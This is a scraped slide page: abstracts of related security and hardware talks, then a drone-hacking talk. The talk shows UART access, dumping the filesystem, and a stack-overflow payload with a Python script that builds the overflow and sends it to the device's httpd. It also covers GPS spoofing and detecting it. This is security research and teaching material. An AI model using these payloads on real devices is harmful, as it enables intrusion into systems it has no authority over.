Codemotion Rome 2015 - Building a drone from scratch with spare parts is a challenging business. To accomplish this journey, a Linux embedded stability control system is developed entirely from scratch. This is a journey starting from choosing the hardware (a home WiFi router) to a stable, real flight. Unconventional implementations are one of the main topics, like using WiFi as the communication link between drone and pilot, HTML5 and COMET to show telemetry from the router's web server, and implementing an entirely new protocol based on 802.11 Beacon Frames to prevent deauthentication attacks.
True stories on the analysis of network activity using Python, by delimitry
A presentation from the SPbPython community / PiterPy meetup.
The presentation covers the problems of analysing the network activity of applications on Linux using Python. The following topics are covered: analysis of network packets, analysis of packet filters, packet crafting using Scapy, and analysis of open ports.
Black Hat Europe 2015 - Time and Position Spoofing with Open Source Projects, by Wang Kang
Time and position data of mobile devices are trusted without verification by most vendors and developers. We discover a method of GPS spoofing with low-cost SDR devices. The method can be used to alter the location status as well as the time of affected devices, which poses a security threat to location-based services. We also examine other positioning methods used by smart devices (e.g. WiFi) and how to spoof them. Advice on preventing such spoofing is given.
Ken will explore the application of React and React Native to hardware projects, and the lessons learned while building a remotely controlled robotic crossbow.
The Raspberry Pi is a well-known little Linux machine that almost everybody has. But did you know that it can replace multiple programmers and enrich your hacking toolbox?
In this talk, we will take a look at how to use a Raspberry Pi (any model) to program any 3.3V target device, from AVR micro-controllers, CPLD and FPGA devices to the CC110x found in the IM-ME, a nice little gadget useful for sub-1GHz radio spectrum analysis.
We will cover openocd, urjtag, avrdude and other projects which are useful if you want to run your own code on more or less any device.
Predicting and Abusing WPA2/802.11 Group Keys, by vanhoefm
We analyze the generation and management of WPA2 group keys. These keys protect broadcast and multicast Wi-Fi traffic. We discovered several issues and illustrate their importance by decrypting all group (and unicast) traffic of a typical Wi-Fi network.
First we show that the 802.11 random number generator is flawed by design, and provides an insufficient amount of entropy. This is confirmed by predicting randomly generated group keys on several platforms. We then examine whether group keys are securely transmitted to clients. Here we discover a downgrade attack that forces usage of RC4 to encrypt the group key when transmitted in the 4-way handshake. The per-message RC4 key is the concatenation of a public 16-byte initialization vector with a secret 16-byte key, and the first 256 keystream bytes are dropped. We study this peculiar usage of RC4, and find that capturing 2 billion handshakes can be sufficient to recover (i.e., decrypt) a 128-bit group key. We also examine whether group traffic is properly isolated from unicast traffic. We find that this is not the case, and show that the group key can be used to inject and decrypt unicast traffic. Finally, we propose and study a new random number generator tailored for 802.11 platforms.
Deep submicron backdoors - Ortega - SyScan 2014 slides, by ortegaalfredo
Malicious hardware is a mature topic but previous research has focused almost exclusively on theoretical applications. In this article, practical implementations of gate-level backdoors will be presented using the Verilog hardware description language, then simulated and finally synthesized using freely available deep sub-micron (45-180 nm) standard cells, resulting in a backdoored latest-generation ARM CPU, suitable for fabrication and massive deployment.
A Drone Tale by Paolo Stagno - Hacktivity 2018
In 2013, DJI drones quickly gained the reputation of being the most stable platform for use in aerial photography and other fields. Since then drones have widened their field of application and are actively used across various industries (law enforcement and first responders, utility companies, governments and universities) to perform critical operations on a daily basis. As a result, drone security has also become a hot topic in the industry.
This talk will provide a comprehensive overview of the security model and the security issues affecting the underlying technologies, including existing vulnerabilities in the radio signals, Wi-Fi, chipset, FPV system, GPS, app and SDK. As part of the presentation, we will discuss the architecture of one of the most famous and popular consumer drone products: the DJI Phantom 3. This model will be used to demonstrate each of the discovered security vulnerabilities, together with recommendations and mitigations.
A special focus will be on the recent changes and countermeasures DJI has applied to the firmware of its products in order to harden their security, following the recent accusations and the US Army ban. While the topic of hacking drones by faking GPS signals has been presented at major security conferences in the past, this talk will extend these aspects to include geo-fencing and no-fly zone abuses.
A Drone Tale by Paolo Stagno - Sec-T 2018
Embedded Recipes 2019 - Introduction to JTAG debugging, by Anne Nicolas
This talk introduces JTAG debugging capabilities, both for debugging hardware and software. Marek first explains what JTAG stands for and describes the operation of the JTAG state machine. This is followed by an introduction to the free software JTAG tools OpenOCD and urJTAG. Marek briefly explains how to debug software using those tools and how that ties into the JTAG state machine. However, JTAG was designed for testing hardware. Marek explains what boundary scan testing (BST) is, what BSDL files are and their format, and practically demonstrates how to blink an LED using BST and only free software tools.
Marek Vasut
Controlling the internet of things using wearable tech - Design+Code Day; Ara..., by ArabNet ME
Speaker: Simon Tadros, Backend Architect @conversionpoint
The workshop is an introduction to JavaScript and robotics. johnny-five and cylonjs were the highlighted libraries.
The result was controlling the Arduino via Twitter and the wearable Pebble watch.
NAP: mix and mingle Node-Arduino-Pebble
Hardware stack: Arduino UNO, Pebble watch, mobile phone, breadboard, wires, RGB LED
Workshop outline:
Introduction to the Arduino UNO
Installing the johnny-five library for node.js to program our nodebot and control the Arduino
Introduction to the Pebble SDK and pebble.js
Installing the cylonjs node module to control the Pebble watch via JavaScript
Connecting to the Twitter Stream API and pushing notifications to the Arduino RGB LED
Controlling the notifications using the watch
Q & A
This presentation describes my experience with nRF24L01, Arduino, Bus Pirate and various other hardware toys when somebody who does software gets into contact with "real stuff".
Getting Started with Raspberry Pi - USC 2013, by Tom Paulus
The Raspberry Pi is a small, credit-card sized Linux computer. Developers and hobbyists around the world are creating remarkable applications and projects, and now you can join them. This presentation covers the first steps to using your Pi, from the basics, like burning your SD card, to creating a weather reporter. GPIO basics and simple Python tools are discussed. Communication with other components using SPI or I2C is also covered.
Now that you have your shiny new Raspberry Pi, you may be asking yourself “what can I do with this thing?” Jonathan last spoke about making an emulation box to play all of your favorite classic games from yesteryear, but now he is back with a new project. Welcome to the Software-Defined Radio, one of the coolest devices to hit the market this decade. These often cheap USB gumsticks can pluck precious information right out of the frequencies floating around us for analysis. Join us for an adventure of pairing the amazing Raspberry Pi and the versatile Software-Defined Radio to ride the airwaves and decode data as if it came out of thin air.
Products Used:
RTL-SDR - https://amzn.to/2FYo3yh
HackRF One - https://amzn.to/32Xcyjv
PortaPack - https://amzn.to/3kCrSYG
Raspberry Pi 3B+ - https://amzn.to/33V4zTd
Video: https://www.youtube.com/watch?v=27_2RhtCKdA
D1 T1 T. Yunusov, K. Nesterov - Bootkit via SMS, by qqlan
Having developed a test set, we started to research how safe it is for clients to use the 4G networks of telecommunication companies. During the research we tested SIM cards, 4G USB modems, radio components and the IP access network. First of all we looked for vulnerabilities that could be exploited remotely, via the IP or radio network.
And the results were not long in arriving. In some cases we managed to attack SIM cards and install a malicious Java applet on them; we were able to remotely update USB modem firmware, change the password on a self-care portal via SMS and even gain access to the internal technological network of a carrier.
Further evolution of the attack helped us understand how a simple SMS can be used as an exploit that is able not only to compromise a USB modem and all the communications that go through it, but also to install a bootkit on the box that the modem is connected to.
Introduction to Software Defined Radio (SDR) on Linux, by Pamela O'Shea
An introduction to software defined radio on Linux by Pamela O'Shea. Presented March 31st 2016 at Cyberspectrum Melbourne.
http://www.meetup.com/Cyberspectrum-Melbourne/ @pamoshea
@sdr_melbourne
OSINT RF Reverse Engineering by Marc Newlin (EC-Council)
IoT devices frequently include obscure RF transceivers with little or no documentation, which can hinder the reverse engineering research process. Fortunately, regulatory bodies like the United States' FCC hold a wealth of useful information.
In order to certify wireless devices for sale in different markets, manufacturers must submit their products to test labs which evaluate the behavior of their RF emissions. The test reports often contain detailed physical layer operating characteristics, including RF channels, modulation, and frequency hopping behavior.
By translating regulatory test reports into GNU Radio flow graphs, a researcher is able to focus their efforts on understanding packet formats and protocol behavior instead of grinding away at the physical layer. In this talk, I will discuss the techniques I used while researching the MouseJack vulnerabilities, which allowed me to expedite the process of evaluating a large number of vulnerable devices.
Talk Outline
Overview of various regulatory bodies (FCC, KCC/MSIP, IC, etc), and the data they make publicly available
Discussion of the official and third party tools to query regulatory bodies for specific device information
Using internal device photos from regulatory bodies to identify transceiver part numbers
Using test reports to identify physical layer operating characteristics
Building a GNU Radio flow graph based on information gathered from regulatory test reports or transceiver spec sheets
Sniffing device traffic, inferring operating behavior, and building out a model of the device communication protocol
How TCP/IP attacks can be applied in satellite communications. An interesting example of how to achieve an anonymous Internet connection using DVB and some tricks. Presented in
Network Scanning Phases and Supporting Tools, by Joseph Bugeja
This presentation focuses on the network penetration scanning phase. It introduces tools and techniques that professional pen-testers and ethical hackers need to master to find target machines, openings on those targets and vulnerabilities.
"Costruiamo un Rover in 60 minuti" ("Let's build a rover in 60 minutes") by Marco Dal Pino, Marco Minerva.
IoT is easier said than done! In a session that is all code, screwdrivers and components, we see how to build a rover that can move through an unknown space, avoiding obstacles and allowing environmental parameters to be measured. We will use all the main rapid-prototyping and sensor-interfacing technologies to build our little robot.
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for..., by Alexandre Moneger
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even for those that are protocol aware, fuzzer writers typically model the protocol specification and implement packet-awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions until it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
GRX is the global private network where telecom network operators exchange the GPRS roaming traffic of their users. It is also used for all M2M networks where roaming is used, and that is the case for anything from a company's truck fleet management system down to an intelligence GPS location spybug tracking system.
GPRS has been around from 2.5G GSM networks to the upcoming LTE Advanced networks, and is now a quite widespread technology, along with its attacks. GRX had a structuring role in the global telecom world at a time when IP dominance was beginning to be acknowledged. It has now expanded into a lightweight structure using both IP technologies and ITU-originated protocols.
In this presentation, we'll see how this infrastructure is protected and how it can be attacked. We'll discover the issues with specific telco equipment inside GRX, namely GGSN and SGSN, but also now PDN Gateways in the LTE and LTE Advanced "Evolved Packet Core". We will see the implications of this for the GTP protocol, DNS infrastructure, AAA servers and core network technologies such as MPLS, IPsec VPNs and their associated routing protocols. These network elements were rarely evaluated for security, and during our vulnerability analysis engagements we have seen several vulnerabilities that we will show in this talk.
We will demo some of the attacks on a simulated "PS Domain" network, that is, the IP part of the telecom core network that transports customers' traffic, and investigate its relationships with legacy SS7, SIGTRAN IP backbones, M2M private corporate VPNs and telecom billing systems. We will also see how automation enables us to succeed at attacks which are hard to perform, and will show how a "sentinel" attack was able to compromise a telecom core network during one penetration test.
Protocol T50: Five months later... So what?, by Nelson Brito
T50 (an Experimental Mixed Packet Injector): new features added in version 5.3 (Chaos Maker).
Check the original demonstration videos:
- https://www.youtube.com/playlist?list=PLda9TmFadx_m2qdd-euUf4zhQ-5juTVEx
For the source code, please refer to:
- http://t50.sourceforge.net/
Slides from my talk at DevFest Prague 2017 with a few thoughts on the topic of "When a robot is smart enough", with examples of how you can build one at home from Open Hardware components.
Ideas were demonstrated on a showcase of my #Probee smart robotic car built using #Arduino and #RaspberryPi.
All code is open source at https://github.com/Juicymo/iot-probee
Link to event: https://2017.devfest.cz/schedule/day1?sessionId=123
Talk was presented on 2017/11/04
#DevFestCZ #Probee
Birds of a Feather 2017: Invited talk - Light Up The Korean DarkWeb - Dasom Kim, by HITCON GIRLS
10 December 2017 - Birds of a Feather (BoF for short) literally refers to birds flying together with others of the same kind; the phrase later came to mean bringing like-minded people together or holding an informal gathering.
https://hitcon-girls.blogspot.tw/2017/12/Birds-of-a-Feather.html
Birds of a Feather 2017: Invited talk - Glance into the Enterprise InfoSec Field - Howard, by HITCON GIRLS
Industrial Training at Shahjalal Fertilizer Company Limited (SFCL), by MdTanvirMahtab2
This presentation is about the working procedure of Shahjalal Fertilizer Company Limited (SFCL), a government-owned company of the Bangladesh Chemical Industries Corporation under the Ministry of Industries.
Student information management system project report ii.pdf, by Kamal Acharya
Our project is about student management. It covers the various actions related to student details, making it easy to add, edit and delete them, and provides a less time-consuming process for viewing, adding, editing and deleting the marks of the students.
Cosmetic shop management system project report.pdf, by Kamal Acharya
Buying new cosmetic products is difficult. It can even be scary for those who have sensitive skin and are prone to skin trouble. The information needed to alleviate this problem is on the back of each product, but it's tough to interpret those ingredient lists unless you have a background in chemistry.
Instead of buying and hoping for the best, we can use data science to help us predict which products may be good fits for us. The project includes various function programs to do the above-mentioned tasks.
Data file handling has been used effectively in the program.
The automated cosmetic shop management system should deal with the automation of the general workflow and administration process of the shop. The main processes of the system focus on the customer's request, where the system is able to search for the most appropriate products and deliver them to the customer. It should help the employees to quickly identify the list of cosmetic products that have reached the minimum quantity and also keep track of the expiry date of each cosmetic product. It should help the employees to find the rack number in which a product is placed. It is also a faster and more efficient way of working.
10. Sniff traffic - SDR
• Software-Defined Radio
– Generate any radio protocol, if the device supports that frequency
– Write the modulation / demodulation program yourself
– Simply inspect the radio spectrum
11. How to hack? (after disassembly)
• Identify chipsets
• Find out the debug port
– UART
– SWD
– JTAG
• Dump the flash rom
– Bus Pirate
• Analysis the signal
– Logic Analyzer
23. Find out debug port – part 5
• Analyze the signal with a logic analyzer
– GND-GND
24. Find out debug port – part 6
• Analyze the signal with a logic analyzer
25. Find out debug port – part 7
• Analyze the signal with a logic analyzer
– Calculate the baud rate from the bit time: one bit lasts about 17.25 µs
– 1/0.00001725 ~= 57971
– Common baud rates:
300, 1200, 2400, 4800, 9600, 14400, 19200, 28800, 38400, 57600, 115200
– 57971 is closest to the standard 57600
26. Find out debug port – part 8
• Analyze the signal with a logic analyzer
– Decode with the Async Serial analyzer
– Baud rate 57600
27. Find out debug port – part 9
• Analyze the signal with a logic analyzer
– Finally the signal decodes
28. Find out debug port – part 10
• Analyze the signal with a logic analyzer
– Finally we know…
29. Find out debug port – part 11
• Connect to a USB-TTL adapter
– GND-GND
– TXD-RXD
– RXD-TXD
30. Find out debug port – part 12
• Finally we get a PuTTY shell
31. Key mapping is wrong?
• 0x13 -> v
• 0x14 -> ?
• 0x15 -> u
• 0x16 -> ?
• 0x17 -> t
• I followed this strange rule to write the decoder
/* Map one ASCII character to the code the device uses on the console:
   the last table entry ('~') maps to 0x03 and every step back through the
   table adds 2, so printable characters land on odd codes only
   (0x13 -> 'v', 0x15 -> 'u', 0x17 -> 't'; even codes are unassigned). */
char asciitable[] = " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~";
for (int i = 0; i < sizeof(asciitable) - 1; i++)
{
    if (tmpchr == asciitable[i])
    {
        tmpinput[inputpos++] = 0x03 + (sizeof(asciitable) - 2 - i) * 2;
    }
}
33. Just because the RXD pin was not soldered well
34. Pull the filesystem off the device
• tar -zcvf /www/fs.tar.gz /
– The archive is written under /www so it can be fetched from the device's web server
35. Find the vulnerability – part 1
• Fuzz the web interface
– httpClient.request("POST", "/login.html", "a"*30000)
• /usr/sbin/httpd crashes
36. Find the vulnerability – part 2
• Upload gdbserver (MIPS build) for remote debugging
– /usr/sbin/httpd; ./gdbserver --attach 0.0.0.0:5555 `pidof httpd`
37. Find the vulnerability – part 3
• Stack overflow
• Finally located the crashing function
– /usr/sbin/httpd 0x0040D44C
• If the overwritten stack contents are wrong, the function crashes before we gain control of ra (the return address, i.e. the instruction pointer)
• So we need to dump the original stack and replay it in the payload
– dump memory stack.bin $sp $sp+26000
• ASLR is enabled
– # cat /proc/sys/kernel/randomize_va_space
– 1
38. Find the vulnerability – part 4
• Control ra (the return address)
origstack = ("\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
             "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
             "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00")
s0 = "\x41\x41\x41\x41"
s1 = "\x00\x00\x54\x00"
s2 = "\x43\x43\x43\x43"
s3 = "\x44\x44\x44\x44"
s4 = "\x8C\x8E\x4F\x00"
s5 = "\x46\x46\x46\x46"
s6 = "\x60\xE2\x53\x00"
s7 = "\x04\x00\x00\x00"
s8 = "\x49\x49\x49\x49"
ra = "\x78\x56\x34\x12"
• httpClient.request("POST", "/login.html", "a"*25262 + origstack + s0+s1+s2+s3+s4+s5+s6+s7+s8 + ra)
• Payload layout:
– aaaa.. (25262 bytes)
– Original stack variables (48 bytes)
– Saved registers s0~s8 (36 bytes)
– Return address ra (0x12345678, little-endian)
39. Find the vulnerability – part 5
• Bypass the ASLR
– randomize_va_space = 1 is conservative randomization: shared libraries, stack, mmap(), VDSO and heap are randomized, but the main executable is loaded at its fixed address when it is not built as PIE
– So find the ROP chain inside the program itself; the fixed 0x004xxxxx–0x005xxxxx values placed in s1, s4 and s6 on the previous slide lie in that unrandomized httpd image
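The following is an added example, not code from the talk: it generalizes the two steps on slides 37 and 38. Instead of reading the offset of ra out of the dumped stack by hand, it sends a cyclic pattern and recovers the offset from the ra value gdb shows at the crash; it then lays the request body out exactly as slide 38 does (filler, replayed original stack, nine saved registers s0~s8, ra). The padding length, the original-stack bytes and the register values are copied from slide 38; the send() helper, its host/port arguments and the little-endian assumption for this MIPS target are assumptions.

```python
import struct
import string
from itertools import product

# Values copied from slide 38: saved s0..s8 of the MIPS o32 frame and the
# 0x12345678 marker that proves ra is controlled.  Little-endian is assumed
# (the slide's "\x78\x56\x34\x12" reads as 0x12345678 that way).
SAVED_REGS = [0x41414141, 0x00540000, 0x43434343, 0x44444444,
              0x004F8E8C, 0x46464646, 0x0053E260, 0x00000004, 0x49494949]
RA_MARKER = 0x12345678
PAD_LEN = 25262

# The 46 bytes of original stack contents replayed so httpd does not fault
# before the function returns (three lines of slide 38: 16 + 16 + 14 bytes).
ORIG_STACK = ((b"\x00" * 6 + b"\x01" + b"\x00" * 9) * 2
              + b"\x00" * 6 + b"\x01" + b"\x00" * 7)

PATTERN_MAX = 26 * 26 * 10 * 10 * 4   # 270400 bytes of unique 4-byte chunks


def cyclic_pattern(length):
    """Return `length` bytes where every 4-byte aligned chunk is unique
    ([A-Z][a-z][0-9][0-9]); no unaligned window can match that shape, so
    the four bytes that land in ra identify their offset unambiguously."""
    if length > PATTERN_MAX:
        raise ValueError("pattern supports at most %d bytes" % PATTERN_MAX)
    out = bytearray()
    for a, b, c, d in product(string.ascii_uppercase.encode(),
                              string.ascii_lowercase.encode(),
                              string.digits.encode(), string.digits.encode()):
        if len(out) >= length:
            break
        out += bytes([a, b, c, d])
    return bytes(out[:length])


def pattern_offset(ra_value, length, endian="<"):
    """Map the ra value observed in gdb after the crash back to the offset
    of those bytes in the request body."""
    needle = struct.pack(endian + "I", ra_value)
    off = cyclic_pattern(length).find(needle)
    if off < 0:
        raise ValueError("ra value is not part of the pattern")
    return off


def build_frame(pad_len, orig_stack, saved_regs, ra, endian="<"):
    """Body laid out as on slide 38: filler, replayed original stack,
    saved registers s0..s8 (36 bytes), then the return address."""
    if len(saved_regs) != 9:
        raise ValueError("this frame saves s0..s8: expected 9 register values")
    regs = b"".join(struct.pack(endian + "I", r) for r in saved_regs)
    return b"a" * pad_len + orig_stack + regs + struct.pack(endian + "I", ra)


def ra_offset(pad_len, orig_stack, saved_regs):
    """Offset of ra inside a body produced by build_frame()."""
    return pad_len + len(orig_stack) + 4 * len(saved_regs)


def send(host, body, path="/login.html", port=80):
    """Assumed helper: POST the body to the device's httpd (host/port are
    whatever the drone's web interface listens on)."""
    import http.client
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", path, body)
    return conn.getresponse()


if __name__ == "__main__":
    body = build_frame(PAD_LEN, ORIG_STACK, SAVED_REGS, RA_MARKER)
    print("body length %d, ra at offset %d"
          % (len(body), ra_offset(PAD_LEN, ORIG_STACK, SAVED_REGS)))
```

Workflow: send(host, cyclic_pattern(30000)) in place of the 30000 "a"s, read ra in gdbserver, feed it to pattern_offset() to learn where the return address sits, then send(host, build_frame(...)) with the real gadget addresses in place of the marker.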
42. What is SDR
• Software-Defined Radio
– Generate any radio protocol, as long as the device supports that frequency
– Write the modulation / demodulation program yourself
– Simply inspect the radio spectrum
43. SDR Tools
• HackRF tools
• Gqrx – display the spectrum waterfall
• GNU Radio – GUI tool for modulation/demodulation
• OpenBTS – open source tool for building a GSM base station
• Artemis – identify the protocol
• Baudline – for analyzing the I/Q data
53. RC to drone radio spectrum (FHSS)
• Controls drone direction (up, down, left, right)
• Frequency 2.400~2.483 GHz, each channel about 1 MHz wide
54. DSSS - Drone to RC radio spectrum
• Used for drone-to-remote-controller image transmission
• Frequency 2.4015~2.4815 GHz
• Split into 6 channels, each about 10 MHz wide
55. Finally we found…
• The images carry no checksum, so by jamming the radio frequency we can make the controller display a wrong image
59. Which functions depend on GPS?
• No-fly zone
• Return to home
• Follow me
• Waypoint
60. How to spoof the GPS location?
• Use the SDR
• There is a good open-source GPS simulator on GitHub, called gps-sdr-sim, but it has a limitation: before you can fake a location you have to wait a few minutes for it to generate the I/Q data
• So we improved the code so that it generates the GPS signal in real time and can be steered with a joystick
65. How to detect the fake GPS signal?
• You need a GPS module to debug GPS signals
– u-blox M8N
66. How to detect the fake GPS signal?
• Validate the satellite (GPS) time against a trusted real-time clock
67. How to detect the fake GPS signal?
• Check the implied speed between consecutive fixes
– For example, it is impossible to move from Taiwan to Serbia in one second
68. How to detect the fake GPS signal?
• Validate the GPS sub-frame data
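As an added example (not the speaker's code or the receiver firmware), the three checks of slides 66 to 68 as functions over receiver output: GPS time against a local clock, implied speed between consecutive fixes, and two consistency checks on the 30-bit navigation-message words (the fixed 0x8B TLM preamble and a time-of-week count that advances by one per 6-second subframe, as defined in IS-GPS-200). The sample fixes, the speed ceiling, the clock tolerance and the HOW words are constructed values, not data captured from a drone or from the u-blox M8N.

```python
import math
from datetime import datetime, timezone

# Constructed sample fixes (not real receiver data): GPS-reported UTC time,
# latitude, longitude.  The third fix jumps from Taipei to Belgrade within
# one second, the kind of jump slide 67 describes.
SAMPLE_FIXES = [
    (datetime(2015, 11, 12, 10, 0, 0, tzinfo=timezone.utc), 25.0330, 121.5654),
    (datetime(2015, 11, 12, 10, 0, 1, tzinfo=timezone.utc), 25.0331, 121.5655),
    (datetime(2015, 11, 12, 10, 0, 2, tzinfo=timezone.utc), 44.7866, 20.4489),
]

EARTH_RADIUS_M = 6371000.0
MAX_SPEED_MPS = 60.0      # assumed ceiling for a consumer drone
MAX_CLOCK_SKEW_S = 5.0    # assumed tolerance between GPS time and the local clock
GPS_TLM_PREAMBLE = 0x8B   # fixed 8-bit preamble of every TLM word (IS-GPS-200)
TOW_COUNT_MOD = 100800    # number of 6-second subframes in a GPS week


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS84 positions."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def clock_plausible(gps_time, local_time, max_skew_s=MAX_CLOCK_SKEW_S):
    """Slide 66: the time carried by the GPS signal must agree with a
    trusted local clock (RTC, NTP) within max_skew_s."""
    return abs((gps_time - local_time).total_seconds()) <= max_skew_s


def implausible_moves(fixes, max_speed_mps=MAX_SPEED_MPS):
    """Slide 67: indexes of fixes whose speed implied from the previous fix
    exceeds max_speed_mps, or whose timestamp does not advance."""
    flagged = []
    for i in range(1, len(fixes)):
        t0, lat0, lon0 = fixes[i - 1]
        t1, lat1, lon1 = fixes[i]
        dt = (t1 - t0).total_seconds()
        if dt <= 0 or haversine_m(lat0, lon0, lat1, lon1) / dt > max_speed_mps:
            flagged.append(i)
    return flagged


def tlm_preamble_ok(tlm_word):
    """Slide 68: bits 1-8 of the 30-bit TLM word must be the 0x8B preamble."""
    return (tlm_word >> 22) & 0xFF == GPS_TLM_PREAMBLE


def tow_count(how_word):
    """Truncated time-of-week count: the 17 most significant bits of the
    30-bit HOW word."""
    return (how_word >> 13) & 0x1FFFF


def tow_sequence_ok(how_words):
    """Slide 68: consecutive subframes must carry TOW counts that advance by
    exactly one (6 s), wrapping at the end of the week."""
    counts = [tow_count(w) for w in how_words]
    return all((b - a) % TOW_COUNT_MOD == 1 for a, b in zip(counts, counts[1:]))


if __name__ == "__main__":
    now = SAMPLE_FIXES[0][0]
    print("clock ok:", clock_plausible(SAMPLE_FIXES[0][0], now))
    print("implausible fixes:", implausible_moves(SAMPLE_FIXES))
    # Constructed HOW words with TOW counts 1000, 1001, 1002 (bits 1-17).
    print("subframes ok:", tow_sequence_ok([1000 << 13, 1001 << 13, 1002 << 13]))
```

None of the three checks proves a signal genuine on its own; a spoofer that starts at the true position and time and drifts slowly passes the speed and clock checks, so they are best combined and backed by a second source such as an IMU or barometer.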
78. Conclusion
• IoT threats are multi-dimensional
– In addition to traditional IP network protocols, there are various types of radio protocols
• Be careful with in-car wireless devices attached to the CAN bus network
• A comprehensive protection strategy is needed